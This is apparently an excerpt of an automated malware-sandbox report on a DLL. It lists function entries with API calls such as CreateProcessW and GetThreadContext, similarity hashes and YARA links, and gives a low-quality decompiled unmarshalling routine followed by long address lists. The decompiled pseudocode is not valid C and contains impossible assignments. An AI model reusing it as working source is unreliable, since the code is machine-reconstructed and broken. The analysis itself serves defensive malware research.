                                                                                              • Opcode Fuzzy Hash: d98a243b14e000f678eabc7563dda6309fad6d324cb64c483da890eb2fd235b0
                                                                                              • Instruction Fuzzy Hash: ED91B75400DAE08BDB06E77947A2D603FA167EB23271860BFE5E5862C7CD2443E7DB25
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F7230FB, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 6F72323F
                                                                                              • GetThreadContext.KERNEL32(?,00010007), ref: 6F723262
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ContextCreateProcessThread
                                                                                              • String ID: D
                                                                                              • API String ID: 2843130473-2746444292
                                                                                              • Opcode ID: 18645dc720baba6b035446a103f70195e793809c3327050073e32557ad5f88d5
                                                                                              • Instruction ID: 55c97a9ee829e8bb47d252beff7a680c97059f661817e2decf1dd4f87774a6b6
                                                                                              • Opcode Fuzzy Hash: 18645dc720baba6b035446a103f70195e793809c3327050073e32557ad5f88d5
                                                                                              • Instruction Fuzzy Hash: 9FA1E571E54209EFDB80DFA8CA85BAEBBF5BF09305F104469E515EB291D730AA41CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F722000, Relevance: 7.7, APIs: 5, Instructions: 196fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F722997
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 0d7919dc4beb76136a7a5fa3f881afd0abca99c410f216f4a75ed7b6ad1ee447
                                                                                              • Instruction ID: 71012fc81b350fc2b5fa975cdcc2c699a4e0b0f5cbfb710da6c1fe93d3fcf942
                                                                                              • Opcode Fuzzy Hash: 0d7919dc4beb76136a7a5fa3f881afd0abca99c410f216f4a75ed7b6ad1ee447
                                                                                              • Instruction Fuzzy Hash: C4714E35E54348EAEB50DBF4EA15BEDB7B5BF48710F20851AE618FA2E0E7704A40DB05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 6F7099A7, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 313COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 24%
                                                                                              			E6F7099A7() {
				void* _t219;
				void* _t221;
				void* _t222;

				L0:
				while(1) {
					L0:
					E6F710730( *(_t219 + 0xc), 0, ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c);
					_t222 = _t221 + 0xc;
					 *(_t219 + 0xc) =  *(_t219 + 0xc) + ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c;
					while(1) {
						L47:
						 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
						L1:
						while(( *( *(_t219 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t219 - 0xc) =  *( *(_t219 + 0x10)) & 0x000000ff;
							 *(_t219 - 0xc) =  *(_t219 - 0xc) - 1;
							if( *(_t219 - 0xc) > 0xb8) {
								L46:
								0x6f700000("unhandled format %d\n",  *( *(_t219 + 0x10)) & 0x000000ff);
								_t222 = _t222 + 8;
								while(1) {
									L47:
									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t15 =  *(_t219 - 0xc) + 0x6f709b24; // 0xcccccc0f
							switch( *((intOrPtr*)(( *_t15 & 0x000000ff) * 4 +  &M6F709AE0))) {
								case 0:
									L4:
									E6F70AFA0( *((intOrPtr*)(_t219 + 8)),  *(_t219 + 0xc), 1);
									_push( *(_t219 + 0xc));
									_push( *( *(_t219 + 0xc)) & 0x0000ffff);
									_push("byte=%d => %p\n");
									0x6f700000();
									_t222 = _t222 + 0x18;
									 *(_t219 + 0xc) =  &(( *(_t219 + 0xc))[0]);
									L47:
									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d => %p\n");
									0x6f700000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d => %p\n");
									0x6f700000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L12:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [eax]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f => %p\n");
									0x6f700000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L13:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__edx + 4);
									_push(__eax);
									__ecx =  *__edx;
									_push(__ecx);
									0x6f700000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s => %p\n");
									0x6f700000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L14:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [eax]");
									asm("movsd [esp], xmm0");
									_push("double=%f => %p\n");
									0x6f700000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp - 4) & 0x0000ffff;
									__edx =  *(__ebp + 0xc);
									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d => %p\n");
									0x6f700000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__eax =  *0x6f700000();
									}
									L8:
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L15:
									 *(__ebp - 0x1c) = 0;
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									_push("pointer => %p\n");
									0x6f700000();
									__esp = __esp + 8;
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__edx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(__ecx != 0x11) {
										 *(__ebp + 8) =  *(__ebp + 8) + 4;
										__eax = E6F7073D0(__ecx,  *(__ebp + 8) + 4, 4);
									}
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									 *(__ebp - 0x20) =  *(__eax + 4);
									__edx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__ecx =  *(__ebp + 0x14);
										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											 *(__ebp + 8) = E6F70AF00( *(__ebp + 8), 4);
										}
									} else {
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
										__eax =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x1c) = 1;
									}
									_t101 = __ebp + 0x18; // 0x6f703c70
									__ecx =  *_t101 & 0x000000ff;
									__edx =  *(__ebp + 0x14);
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__ebp - 0x20);
									__ecx =  *(__ebp + 8);
									__eax = E6F70B580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *_t101 & 0x000000ff);
									if( *(__ebp - 0x1c) == 0) {
										L29:
										__edx =  *(__ebp + 0x10);
										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										} else {
											__ecx =  *(__ebp + 0x14);
											__ecx =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) = __ecx;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L47:
											 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L24:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6f700000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												 *(__edx + 4) =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6f700000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x20);
										 *( *(__ebp + 8) + 4) = __ecx;
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6F70AF00( *(__ebp + 8), 4);
										}
										goto L29;
									}
								case 8:
									L33:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6F707480(__ecx, __ebp + 0xc, __ecx, 2);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L34:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6F707480(__ecx, __ecx,  *(__ebp - 0x10), 4);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L35:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6F707480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									goto L0;
								case 0xc:
									L36:
									1 = 1 << 0;
									__eax =  *(__ebp + 0x10);
									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__eax =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__edx =  *(__ebp - 8);
									__eax =  *(__ebp + 8);
									 *(__ebp - 0x18) = E6F70E3A0( *(__ebp + 8),  *(__ebp - 8));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp - 0x18);
									_push( *(__ebp - 0x18));
									_push("embedded complex (size=%d) => %p\n");
									0x6f700000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0x18) & 0x000000ff;
									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
										__ecx =  *(__ebp - 0x18);
										__edx =  *(__ebp + 0xc);
										__eax = E6F710730( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
									}
									__eax =  *(__ebp - 8);
									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
									__ecx =  *( *(__ebp - 8)) & 0x7f;
									__edx =  *(0x6f71b3d8 + __ecx * 4);
									 *(__ebp - 0x14) =  *(0x6f71b3d8 + __ecx * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no unmarshaller for embedded type %02x\n");
										0x6f700000();
										__esp = __esp + 8;
									} else {
										__eax =  *(__ebp - 8);
										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									L45:
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xe:
									L10:
									__edx = __ebp - 0x24;
									 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8), __ebp - 0x24, 4);
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp - 0x24);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *__ecx;
									_push( *__ecx);
									_push("int3264=%ld => %p\n");
									0x6f700000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xf:
									L11:
									__ecx = __ebp - 0x28;
									__edx =  *(__ebp + 8);
									E6F70AFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
									__ecx =  *(__ebp - 0x28);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push(__ecx);
									_push("uint3264=%ld => %p\n");
									0x6f700000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0x10:
									goto L46;
							}
						}
						return  *(_t219 + 0xc);
					}
				}
			}






                                                                                              0x6f7099a7
                                                                                              0x6f7099a7
                                                                                              0x6f7099a7
                                                                                              0x6f7099b7
                                                                                              0x6f7099bc
                                                                                              0x6f7099cc
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f70956c
                                                                                              0x6f709581
                                                                                              0x6f70958a
                                                                                              0x6f709594
                                                                                              0x6f709ab7
                                                                                              0x6f709ac3
                                                                                              0x6f709ac8
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x6f709acb
                                                                                              0x6f70959a
                                                                                              0x6f70959d
                                                                                              0x6f7095a4
                                                                                              0x00000000
                                                                                              0x6f7095ab
                                                                                              0x6f7095b5
                                                                                              0x6f7095c0
                                                                                              0x6f7095c7
                                                                                              0x6f7095c8
                                                                                              0x6f7095cd
                                                                                              0x6f7095d2
                                                                                              0x6f7095db
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7095e3
                                                                                              0x6f7095e5
                                                                                              0x6f7095ed
                                                                                              0x6f7095f5
                                                                                              0x6f7095f8
                                                                                              0x6f7095f9
                                                                                              0x6f7095fc
                                                                                              0x6f7095ff
                                                                                              0x6f709600
                                                                                              0x6f709605
                                                                                              0x6f70960a
                                                                                              0x6f70960d
                                                                                              0x6f709610
                                                                                              0x6f709613
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f709671
                                                                                              0x6f709673
                                                                                              0x6f70967b
                                                                                              0x6f709683
                                                                                              0x6f709686
                                                                                              0x6f709687
                                                                                              0x6f70968a
                                                                                              0x6f70968c
                                                                                              0x6f70968d
                                                                                              0x6f709692
                                                                                              0x6f709697
                                                                                              0x6f70969a
                                                                                              0x6f70969d
                                                                                              0x6f7096a0
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f709726
                                                                                              0x6f709728
                                                                                              0x6f70972c
                                                                                              0x6f709730
                                                                                              0x6f709738
                                                                                              0x6f70973b
                                                                                              0x6f70973c
                                                                                              0x6f70973f
                                                                                              0x6f709743
                                                                                              0x6f709746
                                                                                              0x6f70974b
                                                                                              0x6f709750
                                                                                              0x6f709755
                                                                                              0x6f709758
                                                                                              0x6f70975b
                                                                                              0x6f70975e
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f709766
                                                                                              0x6f709768
                                                                                              0x6f709770
                                                                                              0x6f709778
                                                                                              0x6f70977b
                                                                                              0x6f70977c
                                                                                              0x6f70977f
                                                                                              0x6f709782
                                                                                              0x6f709783
                                                                                              0x6f709785
                                                                                              0x6f709786
                                                                                              0x6f70978b
                                                                                              0x6f70978e
                                                                                              0x6f70978f
                                                                                              0x6f709794
                                                                                              0x6f709799
                                                                                              0x6f70979f
                                                                                              0x6f7097a2
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f7097aa
                                                                                              0x6f7097ac
                                                                                              0x6f7097b0
                                                                                              0x6f7097b4
                                                                                              0x6f7097bc
                                                                                              0x6f7097bf
                                                                                              0x6f7097c0
                                                                                              0x6f7097c3
                                                                                              0x6f7097c6
                                                                                              0x6f7097ca
                                                                                              0x6f7097cf
                                                                                              0x6f7097d4
                                                                                              0x6f7097d9
                                                                                              0x6f7097dc
                                                                                              0x6f7097df
                                                                                              0x6f7097e2
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f70961b
                                                                                              0x6f70961d
                                                                                              0x6f709625
                                                                                              0x6f70962d
                                                                                              0x6f709631
                                                                                              0x6f709634
                                                                                              0x6f709636
                                                                                              0x6f709639
                                                                                              0x6f70963a
                                                                                              0x6f70963d
                                                                                              0x6f70963f
                                                                                              0x6f709640
                                                                                              0x6f709645
                                                                                              0x6f70964a
                                                                                              0x6f70964d
                                                                                              0x6f709656
                                                                                              0x6f709658
                                                                                              0x6f70965d
                                                                                              0x6f70965d
                                                                                              0x6f709663
                                                                                              0x6f709663
                                                                                              0x6f709666
                                                                                              0x6f709669
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f7097ea
                                                                                              0x6f7097ea
                                                                                              0x6f7097f1
                                                                                              0x6f7097f4
                                                                                              0x6f7097f5
                                                                                              0x6f7097fa
                                                                                              0x6f7097ff
                                                                                              0x6f709802
                                                                                              0x6f709805
                                                                                              0x6f70980b
                                                                                              0x6f70980d
                                                                                              0x6f709810
                                                                                              0x6f709810
                                                                                              0x6f709813
                                                                                              0x6f709816
                                                                                              0x6f70981c
                                                                                              0x6f709823
                                                                                              0x6f709827
                                                                                              0x6f70982c
                                                                                              0x6f70982f
                                                                                              0x6f709832
                                                                                              0x6f709835
                                                                                              0x6f709838
                                                                                              0x6f70983f
                                                                                              0x6f709860
                                                                                              0x6f709863
                                                                                              0x6f709869
                                                                                              0x6f709871
                                                                                              0x6f709876
                                                                                              0x6f709841
                                                                                              0x6f709841
                                                                                              0x6f709844
                                                                                              0x6f709847
                                                                                              0x6f70984a
                                                                                              0x6f70984d
                                                                                              0x6f709850
                                                                                              0x6f709857
                                                                                              0x6f709857
                                                                                              0x6f709879
                                                                                              0x6f709879
                                                                                              0x6f70987e
                                                                                              0x6f709882
                                                                                              0x6f709885
                                                                                              0x6f709888
                                                                                              0x6f70988c
                                                                                              0x6f709890
                                                                                              0x6f709894
                                                                                              0x6f7098a0
                                                                                              0x6f709935
                                                                                              0x6f709935
                                                                                              0x6f709938
                                                                                              0x6f70993e
                                                                                              0x6f70994e
                                                                                              0x6f709951
                                                                                              0x6f709940
                                                                                              0x6f709940
                                                                                              0x6f709943
                                                                                              0x6f709946
                                                                                              0x6f709946
                                                                                              0x6f709957
                                                                                              0x6f70995a
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a9
                                                                                              0x6f7098ac
                                                                                              0x6f7098ad
                                                                                              0x6f7098b0
                                                                                              0x6f7098b2
                                                                                              0x6f7098b8
                                                                                              0x6f7098bb
                                                                                              0x6f7098bc
                                                                                              0x6f7098c1
                                                                                              0x6f7098c6
                                                                                              0x6f7098c9
                                                                                              0x6f7098cc
                                                                                              0x6f7098ce
                                                                                              0x6f7098d1
                                                                                              0x6f7098d4
                                                                                              0x6f7098d7
                                                                                              0x6f7098dd
                                                                                              0x6f7098df
                                                                                              0x6f7098e2
                                                                                              0x6f7098e4
                                                                                              0x6f7098e7
                                                                                              0x6f7098ea
                                                                                              0x6f7098ed
                                                                                              0x6f7098f3
                                                                                              0x6f7098f5
                                                                                              0x6f7098f6
                                                                                              0x6f7098fb
                                                                                              0x6f709900
                                                                                              0x6f709900
                                                                                              0x6f709903
                                                                                              0x6f709903
                                                                                              0x6f709907
                                                                                              0x6f70990a
                                                                                              0x6f70990d
                                                                                              0x6f709910
                                                                                              0x6f709913
                                                                                              0x6f709916
                                                                                              0x6f709919
                                                                                              0x6f70991c
                                                                                              0x6f70991f
                                                                                              0x6f709925
                                                                                              0x6f709929
                                                                                              0x6f70992d
                                                                                              0x6f709932
                                                                                              0x00000000
                                                                                              0x6f709925
                                                                                              0x00000000
                                                                                              0x6f709962
                                                                                              0x6f709964
                                                                                              0x6f709968
                                                                                              0x6f70996c
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f709979
                                                                                              0x6f70997b
                                                                                              0x6f70997f
                                                                                              0x6f709983
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f709990
                                                                                              0x6f709992
                                                                                              0x6f70999a
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7099d4
                                                                                              0x6f7099d9
                                                                                              0x6f7099dc
                                                                                              0x6f7099e3
                                                                                              0x6f7099e6
                                                                                              0x6f7099ec
                                                                                              0x6f7099ef
                                                                                              0x6f7099f2
                                                                                              0x6f7099f8
                                                                                              0x6f7099fb
                                                                                              0x6f7099fe
                                                                                              0x6f709a02
                                                                                              0x6f709a0e
                                                                                              0x6f709a11
                                                                                              0x6f709a14
                                                                                              0x6f709a15
                                                                                              0x6f709a18
                                                                                              0x6f709a19
                                                                                              0x6f709a1e
                                                                                              0x6f709a23
                                                                                              0x6f709a26
